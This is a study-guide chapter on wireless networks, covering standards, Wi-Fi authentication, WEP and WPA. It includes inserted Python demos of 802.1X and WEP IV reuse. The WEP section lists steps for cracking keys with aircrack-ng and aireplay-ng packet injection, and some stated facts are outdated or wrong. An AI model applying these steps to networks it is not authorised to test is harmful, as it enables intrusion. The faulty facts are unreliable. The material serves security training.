In this chapter, we will learn about wireless networks, various types of wireless networks, Wi-Fi authentication modes, and types of wireless encryption. This chapter focuses on wireless hacking methodology, Bluetooth hacking, and wireless penetration testing.

15.1 Understand wireless networks, various types of wireless networks, and Wi-Fi authentication modes

Exam Focus: Understand wireless networks, various types of wireless networks, and Wi-Fi authentication modes. Objective includes:
- Understand wireless networks.
- Gain insights on wireless networks.
- Understand various types of wireless networks.
- Understand Wi-Fi authentication modes.

Wireless network

A wireless network refers to any type of computer network that is wireless, and is commonly associated with a telecommunications network whose interconnections between nodes are implemented without the use of wires. Wireless telecommunications networks are generally implemented with some type of remote information transmission system that uses electromagnetic waves, such as radio waves, for the carrier; this implementation usually takes place at the physical level or "layer" of the network.

Wi-Fi

Wi-Fi was developed on the IEEE 802.11 standard. It is widely used in wireless communication and provides wireless access to applications and data across a radio network. Wi-Fi establishes different ways to set up a connection between the transmitter and the receiver, such as DSSS, FHSS, Infrared, and OFDM.

The following are the advantages of wireless networks:
- Installation is fast and easy, and it eliminates wiring through walls and ceilings.
- It is easier to provide connectivity in places where laying cable is difficult.
- The network can be accessed from anywhere within the range of an access point.
- Constant Internet connections using wireless LAN are used in public places such as airports, libraries, and schools.

The following are the disadvantages of wireless networks:
- Wireless networks are not very secure.
- The bandwidth suffers as the number of computers on the network increases.
- Some electronic equipment can interfere with Wi-Fi networks.

Wireless terminologies

Some important wireless terminologies are given below:

GSM: It is a standard developed by the European Telecommunications Standards Institute (ETSI) that defines protocols for 2G digital cellular networks used by mobile phones.
Directional antenna: It sends and receives signals from a specific direction.
Omni-directional antenna: It is a vertical antenna system which sends or receives signals in all directions.
Wi-Fi Finder: It is used to find a Wi-Fi network.
Association: It is the process of connecting a wireless device to an access point.
Authentication: It is the process of identifying a device before allowing it to access the network resources.
BSSID: It is an identifier used to identify a particular BSS (Basic Service Set) within an area.
WPA: It is an advanced security protocol for WLAN. It uses TKIP, MIC, and AES encryption.
WEP: It is a security protocol for WLANs. It has two components, authentication and encryption.
Gigahertz: It is a unit of frequency equal to one thousand million hertz (1,000,000,000 Hz).
Hotspot: It represents a place where a wireless network is available for public use.
Access point: It connects wireless devices to a wireless network.
ISM band: It is a frequency band that is reserved internationally for the use of radio frequency (RF) energy for industrial, scientific, and medical purposes other than communications.
Bandwidth: It is a measurement of how much data can be sent in a period of time.

Types of wireless networks

The following are types of wireless networks:

WPAN: WPAN is a wireless personal area network that interconnects devices centered on an individual person's workspace. A wireless personal area network uses a technology that permits communication within a range of 20 feet.
WPAN operates at frequencies of around 2.4 GHz in digital modes and supports only eight active devices. It is defined in the IEEE 802.15 standard. Bluetooth is an example of a wireless personal area network.

WLAN: A wireless LAN (or WLAN, for wireless local area network, sometimes referred to as LAWN, for local area wireless network) is one in which a mobile user can connect to a local area network (LAN) through a wireless (radio) connection. IEEE 802.11 is a group of standards that specifies the technologies for wireless LANs. 802.11 standards use the Ethernet protocol and CSMA/CA (carrier sense multiple access with collision avoidance) for path sharing and include an encryption method, the Wired Equivalent Privacy algorithm. High-bandwidth allocation for wireless will make possible a relatively low-cost wiring of classrooms in the United States. A similar frequency allocation has been made in Europe. Hospitals and businesses are also expected to install wireless LAN systems where existing LANs are not already in place.

WMAN: A Wireless Metropolitan Area Network (WMAN) is a wireless network that connects two or more wireless LANs in the same geographical area. WMANs are used as backbone services as well as point-to-point and point-to-multipoint links, which are implemented using high-speed connections such as T1, T3, etc. WMAN is also known as a Wireless Local Loop (WLL). WMANs are defined in the IEEE 802.16 standard. An example of a Wireless Metropolitan Area Network is WiMAX, which provides last-mile access as an alternative to broadband services such as DSL or cable connections. WiMAX provides fixed, roaming, portable and soon mobile wireless broadband connectivity without the need for a direct line of sight to a base station.

WWAN: WWAN, which stands for Wireless Wide Area Network, is a form of wireless network.
A WWAN differs from a WLAN (wireless LAN) in that it uses mobile telecommunication cellular network technologies, such as WiMAX (though this is better applied to WMAN networks), UMTS, GPRS, CDMA2000, GSM, CDPD, Mobitex, HSDPA, or 3G to transfer data. It can also use LMDS and Wi-Fi to connect to the Internet. These cellular technologies are offered regionally, nationwide, or even globally and are provided by a wireless service provider, typically on a paid basis. This type of connectivity allows a user with a laptop and a WWAN card to surf the web, check email, or connect to a Virtual Private Network (VPN) from anywhere within the regional boundaries of cellular service. Various computers now have integrated WWAN capabilities (such as HSDPA in Centrino). This means that the system has a cellular radio (GSM/CDMA) built in, which allows the user to send and receive data.

WLAN summarized!

A Wireless Local Area Network (WLAN) is a network that enables devices to connect to the network wirelessly. WLAN uses radiated energy, commonly called high-frequency radio waves, to communicate amongst nodes.

Organizations that influence WLAN standards

The four major organizations that set or influence WLAN standards are described below:

ITU-R: The International Telecommunications Union-Radiocommunication (ITU-R) is a worldwide organization of the United Nations. It works for the standardization of communications that use radiated energy. Its prime objective is to manage the assignment of frequencies.

IEEE: The Institute of Electrical and Electronics Engineers (IEEE) is a society of technical professionals. It promotes the development and application of electro-technology and allied sciences. IEEE develops communications and network standards, among other activities. The organization publishes a number of journals and has many local chapters and societies in specialized areas.
Wi-Fi Alliance: The Wi-Fi Alliance is an industry consortium that encourages interoperability of products that use WLAN standards. The consortium runs a certification program and recognizes products that implement WLAN standards as Wi-Fi certified products.

FCC: The Federal Communications Commission (FCC) is an independent US government agency. It regulates interstate and international communications by radio, television, wire, satellite, and cable in the United States of America.

Modes of Wireless LANs

There are two modes of WLANs: ad hoc mode and infrastructure mode.

Ad hoc mode WLAN: An ad hoc network consists of two or more wireless devices that communicate directly with each other. The wireless local area network (WLAN) network interface adapters in the wireless devices generate omni-directional signals within a limited range called the Basic Service Area (BSA). When two wireless devices come within range of each other, they immediately form a two-node network and are able to communicate with each other. An ad hoc network is non-transitive.

Infrastructure mode WLAN: An infrastructure network consists of an access point that connects wireless devices to the standard cabled network. An access point is connected to a cabled network through a cable and generates omni-directional signals. When wireless devices come within range of the access point, they are able to communicate with the cabled local area network. The access point works as a central bridge device to include wireless devices in the cabled LAN.

Wireless Technologies

802.11: This is the latest networking specification for wireless local area networks (WLANs), developed by the Institute of Electrical and Electronics Engineers. It contains several subspecifications, and the IEEE is constantly adding new specifications. This specification uses the Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA) media access control mechanism.
802.11 supports 1 or 2 Mbps transmission in the 2.4 GHz ISM band using Frequency Hopping Spread Spectrum (FHSS).

802.11x: This contains various specifications for the 802.11 family of Wireless LAN network standards. Some of the specifications in this family are still under development. The 802.11b specification uses Direct Sequence Spread Spectrum (DSSS) and supports 11 Mbps transmission in the 2.4 GHz band.

Infrared: Infrared technology uses invisible infrared radiation to transmit signals over short distances. Two types of network communication are possible: one in which the sender and the receiver are visible to each other and situated in a straight line, known as line-of-sight mode; the other, known as diffuse mode, does not require the sender and receiver to be directly visible to each other. This technology is used in TV sets, cordless microphones, laptops, remote modems, printers, and other peripheral devices. Infrared networks use frequencies in the terahertz range and support transmission speeds of 1 to 2 Mbps.

Bluetooth: Bluetooth technology uses short-range radio frequencies to transmit voice and data signals at a speed of 1 Mbps on a frequency of 2.4 GHz. Bluetooth is used to automatically synchronize information among different types of computers such as desktops, laptops, and palmtops, or to connect to the Internet through a cell phone.

Important Protocols

WAP: Wireless Application Protocol (WAP) supports mobile computing. It was developed by the WAP Forum. The functionality of WAP is equivalent to that of TCP/IP. WAP uses a smaller version of HTML called Wireless Markup Language (WML) to display Internet sites.

WEP: Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks (WLANs). It has two components, authentication and encryption. It provides wireless networks with security equivalent to that of wired networks. WEP encrypts data on a wireless network by using a fixed secret key.
WEP incorporates a checksum in each frame to provide protection against attacks that attempt to reveal the key stream.

Infrastructure network

Infrastructure is a basic topology of a wireless network. An infrastructure network consists of an access point that connects wireless devices to the standard cabled network. An access point is connected to the cabled network through a cable and generates omni-directional signals. When wireless devices come within range of the access point, they are able to communicate with the cabled local area network. The access point works as a central bridge device to include wireless devices in the cabled LAN.

Wireless standards

The following are wireless standards:

802.11a: The IEEE 802.11a standard for WLAN uses the U-NII spectrum at 5 GHz. It uses the Orthogonal Frequency Division Multiplexing (OFDM) encoding class. The maximum speed supported by the 802.11a standard is 54 Mbps.

802.11b: 802.11b is an amendment to the IEEE 802.11 specification that extended the throughput up to 11 Mbit/s using the same 2.4 GHz band. This specification, under the marketing name of Wi-Fi, has been implemented across the world. 802.11b is used in a point-to-multipoint configuration, wherein an access point communicates via an omnidirectional antenna with one or more nomadic or mobile clients that are located in a coverage area around the access point.

802.11g: The 802.11g standard, defined by IEEE, is an extension to the 802.11b wireless network standard. It operates in the 2.4 GHz band and brings data rates up to 54 Mbps, using Orthogonal Frequency-Division Multiplexing (OFDM) technology. Since the 802.11g standard is backward compatible with 802.11b, an 802.11b device can interface directly with an 802.11g access point.

802.11i: The IEEE 802.11i standard specifies the security mechanisms for Wireless LAN (WLAN). The standard includes authentication and encryption.
802.11n: IEEE 802.11n is an upcoming improvement to the IEEE 802.11-2007 wireless networking standard to improve network throughput over previous standards, such as 802.11b and 802.11g. The IEEE 802.11n standard offers data rates from 54 Mbps to a maximum of 600 Mbps. The current state of the art supports a physical rate of 450 Mbps, with the use of 3 spatial streams at a channel width of 40 MHz. Depending on the environment, this may translate into a user throughput of 110 Mbps.

802.16: IEEE 802.16 is a set of Wireless Broadband standards authorized by the IEEE. IEEE 802.16 was written by a workgroup of the IEEE Standards Board, formed in 1999 to develop standards for the global deployment of broadband Wireless Metropolitan Area Networks. The workgroup is a unit of the IEEE 802 LAN/MAN Standards Committee. The IEEE 802.16 standard is also known as the wireless metropolitan area network (WirelessMAN) standard.

Bluetooth: Bluetooth supports a very short range (10 meters) and relatively low bandwidth (1-3 Mbps). It is designed for low-power network devices.

IEEE 802 Members

The Institute of Electrical and Electronics Engineers (IEEE) is a leading organization in the world. It constituted a task force to set standards for connectivity between NICs and transmission media. This task force is known as the 802 committee. The 802 committee was subdivided into several subgroups, and each group is responsible for the implementation of a single standard that specifies the data transfer that occurs at the data link layer of the OSI model. A brief description of these subgroups is given below:

802.1: This standard is responsible for data communication between all seven layers of the OSI model.

802.2: It defines the LLC (Logical Link Control) sublayer of the data link layer that is used by lower layer protocols.

802.3: The 802.3 standard defines Ethernet and the functions related to the MAC (medium access control) sublayer of the data link layer.
There are different types of transmission media in 802.3:
- 1BASE5: The data transfer rate is 1 Mbps and it uses UTP cable with a signal range of up to 500 meters. In this standard, the star topology is used.
- 10BASE5: Also known as thick Ethernet, it supports a data transfer rate of 10 Mbps with a signal range of up to 500 meters. In this standard, coaxial thicknet cable is implemented.
- 10BASE2: It uses thinnet coaxial cable and has a data transfer speed of 10 Mbps. In this standard, the bus topology is used.
- 10BASE-F: It implements fiber optic cable. The data transfer rate is 10 Mbps.

Conceived in the 1960s, Ethernet (802.3) is the oldest and most popular data link layer protocol (or network technology) used in today's networks. Ethernet networks use a bus or star topology and control the flow of data through the media access control (MAC) method known as Carrier Sense Multiple Access with Collision Detection (CSMA/CD). The use of CSMA/CD ensures that each computer in a network can send its signals over the network. To send signals over the network, a computer waits for the network to be free of any traffic. If the network is free, the computer sends its signals, which travel through the network and are received by the destination computer. Sometimes more than one computer sends its signals over the network at the same time, which results in a collision. Collisions in these types of networks cannot be avoided, as CSMA/CD can detect them only when they occur. It then resends the data over the network to compensate for the data loss. Ethernet networks run at various speeds, depending on the type of topology and cabling used. Ethernet technology is widely implemented in the star topology using coaxial or fiber optic cables, and in the bus topology using UTP cable.

802.4: This defines a network with the bus topology that implements media access control with a token mechanism.

802.5: This defines a network with the ring topology. It uses media access control with a token mechanism.
It supports data transfer rates of 1, 4, and 16 Mbps. Originally developed by IBM, token ring is an intricate but highly dependable networking technology that follows the IEEE 802.5 standard. The topology used in this technology is physically a star, but implemented logically as a ring, in which all the computers are attached to a central unit called a multistation access unit (MAU or MSAU). Token ring networks use token passing to send their signals over the network. A token is a type of data packet which circulates around the entire network. If the token is free, the computer waiting to send data takes it, attaches the data and the destination address to the token, and sends it. When the token reaches its destination computer, the data is received. Then the token gets back to the originator. If the originator finds that the message has been received, it removes the message from the token. Now the token is free and can be used by other computers in the network to send data. Token ring networks are more fault tolerant than Ethernet, as the MSAU ensures that the failure of a single computer does not bring the entire network down. It is an intelligent device which identifies the failing computer in the network and then bypasses it to correct the errors. Modern-day token ring networks use unshielded twisted pair (UTP) cable and run at speeds of 16 Mbps, as opposed to the original token ring networks developed by IBM that used shielded twisted pair (STP) cable and ran at 4 or 16 Mbps.

802.6: This describes a MAN standard known as Distributed Queue Dual Bus (DQDB). DQDB is designed for data, voice, and video transmission through fiber optic cable. The dual bus topology is employed and traffic on each bus is unidirectional.

802.8: This standard deals with the implementation of fiber optic technology in a networking environment.
802.11: The IEEE 802.11 standards define wireless local area network (WLAN) computer communication in the 5 GHz and 2.4 GHz public spectrum bands. These specifications define an over-the-air interface between a wireless client and a base station or access point. The 802.11 specifications also define standards among wireless clients. These specifications address both the Physical (PHY) and Media Access Control (MAC) layers and are tailored to resolve compatibility issues between manufacturers of wireless LAN equipment.

Apart from these IEEE standards, there is one more standard, named FDDI, developed by ANSI.

FDDI (Fiber Distributed Data Interface)

Developed by the American National Standards Institute (ANSI), FDDI is a ring-based network that uses fiber optic cables to provide very fast and reliable communication between the connected computers. It uses token passing to control network access but does not use a hub like token ring networks; instead, it uses a central device called a concentrator to connect the computers in the network. In these networks, the computers are connected using a physical ring topology. There are two types of configurations used by FDDI networks, namely class A and class B configurations. In class A, a double ring topology is used in which the computers are connected to two rings. The signals travel in opposite directions on the two rings. If there is a fault in one ring, the receiving computer can still receive the signal through the other ring. These networks provide better fault tolerance. Class B networks use a single physical ring and are, therefore, less fault tolerant. FDDI networks run at speeds of 100 Mbps and, as they use fiber optic cables, provide connectivity over long distances. These networks have now been replaced by Fast Ethernet networks that provide the same speed and are more fault tolerant.

SSID

SSID stands for Service Set Identifier. It is used to identify a wireless network.
SSIDs are case-sensitive text strings and have a maximum length of 32 characters. All wireless devices on a wireless network must have the same SSID in order to communicate with one another. The SSID on computers and devices in a WLAN (Wireless Local Area Network) can be set manually or automatically. Configuring the same SSID as that of the Wireless Access Points (WAPs) of other networks will create a conflict. A network administrator often uses a public SSID that is set on the access point. The access point broadcasts the SSID to all wireless devices within its range. Some newer wireless access points have the ability to disable the automatic SSID broadcast feature in order to improve network security.

Wi-Fi authentication modes

The open system authentication process includes the following steps:
1. A client sends an 802.11 authentication management frame that includes its SSID.
2. The Access Point (AP) checks the client's SSID and sends back an authentication verification frame.
3. The client connects to the network.

The shared key authentication process includes the following steps:
1. A client trying to connect sends an authentication request to the Access Point (AP).
2. The AP sends challenge text.
3. The client encrypts the challenge text and sends it back to the AP.
4. The AP decrypts the challenge text and authenticates the client.
5. The client connects to the network.

Wi-Fi authentication process

The Wi-Fi authentication process includes the following steps:
1. The AP issues a challenge to the wireless client. The wireless client responds with its identity.
2. The AP forwards the identity to the RADIUS server using the uncontrolled port.
3. The RADIUS server sends a request to the wireless station through the AP specifying the authentication mechanism to be used.
4. The wireless station responds to the RADIUS server with its credentials through the AP.
5. The RADIUS server sends an encrypted authentication key to the AP if the credentials are acceptable.
6. The AP generates a multicast/global authentication key encrypted with a per-station unicast session key and transmits it to the wireless station.

Wi-Fi authentication process using a centralized authentication server

The Wi-Fi authentication process using a centralized authentication server includes the following steps:
1. A client requests a connection from the Access Point (AP).
2. The AP sends an EAP-Request for identity to the client.
3. The client sends an EAP-Response with its identity to the AP.
4. The AP forwards the identity to the RADIUS server using the uncontrolled port.
5. The RADIUS server sends a request to the wireless client through the AP specifying the authentication mechanism to be used.
6. The wireless client responds to the RADIUS server with its credentials through the AP.
7. The RADIUS server sends an encrypted authentication key to the AP if the credentials are acceptable.
8. The AP sends a multicast/global authentication key encrypted with a per-station unicast session key.

Wi-Fi chalking

Some examples of Wi-Fi chalking are as follows:

Wardriving: Wardriving is a technique used to locate insecure wireless networks while driving around. The following are wardriving tools:
- StumbVerter
- MiniStumbler
- ApSniff
- Driftnet
- WiFiFoFum
- WarLinux

Warflying: Warflying is similar to wardriving. It involves flying around in an aircraft, searching for open wireless networks.

Warchalking: Warchalking is the drawing of symbols in public places to advertise an open Wi-Fi wireless network. Having found a Wi-Fi node, the warchalker draws a special symbol on a nearby object, such as a wall, the pavement, or a lamp post. The name warchalking is derived from the cracker terms war dialing and war driving.

Warwalking: Warwalking is a technique similar to wardriving. It is the act of walking around with a Wi-Fi enabled laptop to find an access point for a wireless network.
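Returning to the centralized (802.1X/EAP/RADIUS) authentication steps above, the following simulation runs the exchange between a station, an access point and a RADIUS server offline. It is an added example, not code from the study guide: the challenge-response EAP method, the PMK derivation and the one-user database are constructed stand-ins (production networks use EAP-TLS, PEAP or a similar method). What it demonstrates is the port model the steps describe: the AP relays only EAP over the uncontrolled port and keeps the station's controlled port closed until the RADIUS server returns Access-Accept.

```python
"""802.1X port-based authentication, simulated. Added example; the EAP method,
PMK derivation and user database are constructed stand-ins."""
import hashlib
import hmac
import secrets


class Client:
    """Wireless station (supplicant)."""

    def __init__(self, mac: str, username: str, password: str):
        self.mac, self.username, self.password = mac, username, password

    def identity(self) -> str:
        return self.username

    def respond(self, nonce: bytes) -> bytes:
        # Constructed method: HMAC of the server's nonce under the password.
        return hmac.new(self.password.encode(), nonce, hashlib.sha256).digest()


class RadiusServer:
    """Authentication server; it never exchanges frames with the station directly."""

    def __init__(self, users: dict):
        self.users = users            # constructed: username -> password
        self.pending = {}             # username -> outstanding nonce

    def access_request(self, eap: dict) -> dict:
        if eap["type"] == "identity":
            nonce = secrets.token_bytes(16)
            self.pending[eap["identity"]] = nonce
            # Step 5: Access-Challenge names the method and carries the nonce.
            return {"code": "Access-Challenge", "nonce": nonce}
        if eap["type"] == "response":
            nonce = self.pending.pop(eap["identity"], None)
            password = self.users.get(eap["identity"])
            if nonce is not None and password is not None:
                expected = hmac.new(password.encode(), nonce, hashlib.sha256).digest()
                if hmac.compare_digest(expected, eap["mac"]):
                    # Step 7: Access-Accept carries keying material for the AP
                    # (constructed derivation; real methods export an MSK).
                    pmk = hashlib.sha256(b"constructed-pmk" + nonce).digest()
                    return {"code": "Access-Accept", "pmk": pmk}
        return {"code": "Access-Reject"}


class AccessPoint:
    """Authenticator with one controlled port per station."""

    def __init__(self, radius: RadiusServer):
        self.radius = radius
        self.port_open = {}           # station MAC -> controlled port open?
        self.transcript = []          # who said what, for inspection

    def log(self, src: str, dst: str, what: str) -> None:
        self.transcript.append(f"{src} -> {dst}: {what}")

    def data_frame(self, mac: str) -> bool:
        """Controlled port: station data is dropped until EAP-Success."""
        allowed = self.port_open.get(mac, False)
        self.log(mac, "AP", "data frame " + ("forwarded" if allowed else "dropped"))
        return allowed

    def authenticate(self, client: Client) -> bool:
        self.log(client.mac, "AP", "connection request")                  # step 1
        self.log("AP", client.mac, "EAP-Request/Identity")                # step 2
        identity = client.identity()
        self.log(client.mac, "AP", f"EAP-Response/Identity {identity}")   # step 3
        # Step 4: the uncontrolled port relays EAP to RADIUS and nothing else.
        reply = self.radius.access_request({"type": "identity", "identity": identity})
        self.log("RADIUS", "AP", reply["code"])
        mac = client.respond(reply["nonce"])                              # step 6
        self.log(client.mac, "AP", "EAP-Response (credentials)")
        reply = self.radius.access_request({"type": "response", "identity": identity, "mac": mac})
        self.log("RADIUS", "AP", reply["code"])
        if reply["code"] != "Access-Accept":
            self.log("AP", client.mac, "EAP-Failure; controlled port stays closed")
            return False
        self.port_open[client.mac] = True                                 # step 8
        self.log("AP", client.mac, "EAP-Success; group key sent under per-station key")
        return True


if __name__ == "__main__":
    ap = AccessPoint(RadiusServer({"alice": "correct-horse-battery"}))
    station = Client("00:11:22:33:44:55", "alice", "correct-horse-battery")
    ap.data_frame(station.mac)          # dropped: not yet authenticated
    ap.authenticate(station)
    ap.data_frame(station.mac)          # forwarded
    print("\n".join(ap.transcript))
```

The transcript is the useful artefact: every line before Access-Accept travels over the uncontrolled port as EAP, and the first forwarded data frame appears only after the AP has opened the controlled port for that station's MAC.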
Wi-Fi chalking symbols

Wi-Fi chalking symbols (symbol glyphs not reproduced) and their meanings: Free Wi-Fi; Wi-Fi with MAC filtering; Restricted Wi-Fi; Pay for Wi-Fi; Wi-Fi with WPA; Wi-Fi with multiple access controls; Wi-Fi with closed SSID; Wi-Fi honeypot.

Types of wireless antenna

The following are types of wireless antenna:

Omni-directional antenna: It is a vertical antenna system which sends or receives signals in all directions. Signals generated by an omni antenna lose power as the distance increases. Such antennas are used with Wireless Access Points (WAPs).

Parabolic antenna: A parabolic antenna is a high-gain reflector antenna used for radio, television, and data communications. It is the most efficient type of directional antenna. It provides a large front/back ratio, a very sharp radiation angle, and small side lobes. The relatively short wavelengths of electromagnetic radiation at these frequencies allow reasonably sized reflectors to exhibit the desired highly directional response for both receiving and transmitting. It is the best choice for noisy locations where other antennas probably do not work.

Yagi antenna: It is a directional antenna. It comprises a dipole, a reflector (an element bigger than the dipole), and one or more shorter elements as directors in front of the dipole.

Dipole antenna: It is an antenna that can be made from a simple wire with a center-fed driven element for transmitting or receiving radio frequency energy. This antenna is simply a pair of two wires pointed in opposite directions, arranged either horizontally or vertically, with one end of each wire connected to the radio and the other end hanging free in space. Since this is the simplest practical antenna, it is also used as a reference model for other antennas. The current amplitude on such an antenna decreases uniformly from maximum at the center to zero at the ends.
MAC filtering

MAC filtering is a security access control technique that allows specific network devices to access the network or prevents them from accessing it. MAC filtering can also be used on a wireless network to prevent certain network devices from accessing the wireless network. MAC addresses are allocated only to hardware devices, not to persons.

15.2 Identify types of wireless encryption, and understand WEP encryption and WPA/WPA2

Exam Focus: Identify types of wireless encryption, and understand WEP encryption and WPA/WPA2. Objective includes:
- Identify types of wireless encryption.
- Understand WEP encryption.
- Understand WPA/WPA2.
- Discuss wireless threats.

Types of wireless encryption

The following are the types of wireless encryption:
- WEP: It is the old and original wireless security standard. It can be cracked easily.
- WPA: It uses a 48-bit Initialization Vector (IV), a 32-bit CRC, and TKIP encryption for wireless security.
- WPA2: It is used to provide network administrators with a high level of assurance that only authorized users are able to access the network. It provides government-grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm.
- WPA2 Enterprise: It integrates the EAP standard with WPA encryption.
- TKIP: It is a security protocol. It is used in WPA as a replacement for WEP.
- AES: It is a symmetric key encryption algorithm. It is used in WPA2 as a replacement for TKIP.
- EAP: It supports multiple authentication methods.
- LEAP: It is a proprietary WLAN authentication protocol.
- RADIUS: It is considered a centralized authentication and authorization management system.
- 802.11i: It is an IEEE standard. It specifies security mechanisms for 802.11 wireless networks.
- CCMP: It uses 128-bit keys with a 48-bit IV for replay protection.

WEP

WEP stands for Wired Equivalent Privacy. It is a wireless security standard that uses either 64-bit or 128-bit encryption.
It is the most commonly and widely accepted security standard. Almost all available operating systems, wireless access points, and wireless bridges support this security standard. WEP uses a 24-bit initialization vector to form the RC4 stream cipher for confidentiality and the CRC-32 checksum for the integrity of wireless transmissions. It has major vulnerabilities and design flaws.

The following is the working of WEP:
1. For the frame data, a 32-bit Integrity Check Value (ICV) is calculated.
2. The ICV is added at the end of the frame data.
3. A 24-bit Initialization Vector is produced and added to the WEP encryption key.
4. To generate a key stream, the combination of the Initialization Vector and the WEP key is used as the input to the RC4 algorithm.
5. To produce the encrypted data, the key stream is bit-wise XORed with the combination of data and ICV.
6. To generate the MAC frame, the Initialization Vector is added to the encrypted data and ICV.

WEP issues

The following are WEP issues:
- The Initialization Vector is a 24-bit field and is sent in the cleartext portion of a message.
- There is no defined method for encryption key distribution.
- The reuse of the same IV for data protection produces identical key streams.
- Key streams are repeated within a short time, as the Initialization Vector is a short key.
- The same Initialization Vector may be generated by wireless adapters from the same vendor. This may help attackers determine the key stream and decrypt the ciphertext.
- It is difficult to change the WEP keys regularly due to the lack of centralized key management.
- Association and disassociation messages are not authenticated.
- The RC4 keystream can be reconstructed on the basis of the Initialization Vector (IV) and the decrypted payload of the packet when there is an IV collision.
- WEP does not provide cryptographic integrity protection. An attacker can flip a bit in the encrypted stream by capturing two packets and modify the checksum to obtain the packet.
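The six WEP steps and the IV issues just listed, carried out in code. This is an added example, not code from the study guide: RC4 and CRC-32 are the real primitives WEP specifies, while the 40-bit key, the IVs and the frame payloads are constructed sample values. The IV-reuse report is the kind of check a wireless monitoring tool runs over captured frame bodies, and keystream_cancels shows what a repeated IV costs: with equal IVs, the XOR of two ciphertexts is the XOR of the two plaintexts, so the keystream drops out.

```python
"""WEP encapsulation per the six steps, with an IV-reuse check over captured
frames. Added example; key, IVs and payloads are constructed sample values."""
import struct
import zlib
from collections import Counter


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling followed by keystream generation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encapsulate(key: bytes, iv: bytes, data: bytes, key_id: int = 0) -> bytes:
    """Steps 1-6: ICV = CRC-32(data); keystream = RC4(IV || key);
    ciphertext = (data || ICV) XOR keystream; body = IV || KeyID || ciphertext."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("WEP uses a 24-bit IV and a 40- or 104-bit key")
    icv = struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)      # step 1
    plaintext = data + icv                                      # step 2
    keystream = rc4_keystream(iv + key, len(plaintext))         # steps 3-4
    ciphertext = xor_bytes(plaintext, keystream)                # step 5
    return iv + bytes([key_id & 0x03]) + ciphertext             # step 6


def wep_decapsulate(key: bytes, body: bytes):
    """Reverse the process; returns (icv_ok, data). The IV travels in clear."""
    iv, ciphertext = body[:3], body[4:]
    plaintext = xor_bytes(ciphertext, rc4_keystream(iv + key, len(ciphertext)))
    data, icv = plaintext[:-4], plaintext[-4:]
    expected = struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)
    return icv == expected, data


def iv_reuse_report(frames) -> dict:
    """Monitoring check: IVs seen more than once across captured frame bodies.
    A repeat means two frames were protected with one RC4 keystream."""
    counts = Counter(body[:3] for body in frames)
    return {iv.hex(): n for iv, n in counts.items() if n > 1}


def keystream_cancels(body_a: bytes, body_b: bytes) -> bytes:
    """For two frames with equal IVs, ciphertext_a XOR ciphertext_b equals
    plaintext_a XOR plaintext_b; the shared keystream cancels out."""
    if body_a[:3] != body_b[:3]:
        raise ValueError("frames use different IVs; keystreams differ")
    return xor_bytes(body_a[4:], body_b[4:])


KEY = bytes.fromhex("0102030405")          # constructed 40-bit WEP key

if __name__ == "__main__":
    frames = [                              # constructed capture; third IV repeats
        wep_encapsulate(KEY, b"\x00\x00\x01", b"GET /status"),
        wep_encapsulate(KEY, b"\x00\x00\x02", b"temp=21.5C "),
        wep_encapsulate(KEY, b"\x00\x00\x01", b"GET /admin "),
    ]
    print("ICV ok, data:", wep_decapsulate(KEY, frames[0]))
    print("repeated IVs:", iv_reuse_report(frames))
    print("plaintext XOR exposed:", keystream_cancels(frames[0], frames[2]).hex())
```

Two things to notice when running it: CRC-32 does catch a flipped byte in transit (wep_decapsulate reports icv_ok False), but that is error detection, not the cryptographic integrity protection the issues list says WEP lacks; and a 24-bit IV space means a busy access point repeats IVs within hours, so iv_reuse_report fires on ordinary traffic, not only on an attack.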
- The Initialization Vector is a part of the RC4 encryption key. This results in an analytical attack, in which the key is recovered after intercepting and analyzing a relatively small amount of traffic.
- WEP is based on a password. The password can be cracked using password cracking attacks.
- An attacker can build and use a decryption table of the reconstructed keystream to decrypt WEP packets in real time.

Breaking WEP encryption

The following actions can be taken to break WEP encryption:
1. The injection capability of the wireless device to the access point should be tested.
2. Wi-Fi sniffing tools such as airodump-ng or Cain & Abel should be started with a bssid filter to collect unique IVs.
3. A cracking tool such as Cain & Abel or aircrack-ng should be run to extract encryption keys from the IVs.
4. The wireless monitor should be started in monitor mode on the specific access point channel.
5. A tool such as aireplay-ng should be used to perform a fake authentication with the access point.
6. A Wi-Fi packet encryption tool such as aireplay-ng should be started in ARP request replay mode to inject packets.

Crack WEP using aircrack

Take the following steps to crack WEP using aircrack:
1. Monitor wireless traffic with airmon-ng and collect wireless traffic data with airodump-ng.
2. Associate your wireless card with the AP you are accessing with aireplay-ng and start packet injection with aireplay-ng.
3. Decrypt the WEP key with aircrack-ng.

Countermeasures to prevent WEP cracking

A user can use some countermeasures to prevent WEP cracking. WEP is the least secure protocol and should not be used. However, a user can use the following methods to mitigate WEP cracking:
- Use a non-obvious key.
- Use the longest key supported by the hardware.
- Change keys often.
- Use WEP in combination with other security features, such as rapid WEP key rotation and dynamic keying using 802.1x.
- Consider WEP a deterrent, not a guarantee.

WPA

WPA stands for Wi-Fi Protected Access.
It is a wireless security standard. It provides better security than WEP (Wired Equivalent Privacy). TKIP uses the RC4 stream cipher encryption with 128-bit keys and 64-bit keys for authentication. The WEP key derivation vulnerability is mitigated by TKIP, as TKIP does not involve reusing the same Initialization Vector. Under TKIP, the client starts with a 128-bit "temporal key" (TK). The 128-bit temporal key is then combined with the client's MAC address and with an Initialization Vector in order to create a key used for encrypting data through RC4. TKIP adds a rekeying mechanism to WEP to provide fresh encryption and integrity keys. Temporal keys are changed every 10,000 packets, making TKIP-protected networks more resistant to cryptanalytic attacks that involve key reuse.

The following is the working of WPA:

1. To generate a keystream, the temporal encryption key, transmit address, and TKIP sequence counter are used as input to the RC4 algorithm.
2. The Michael algorithm is used to combine the MAC Service Data Unit (MSDU) and the message integrity check (MIC).
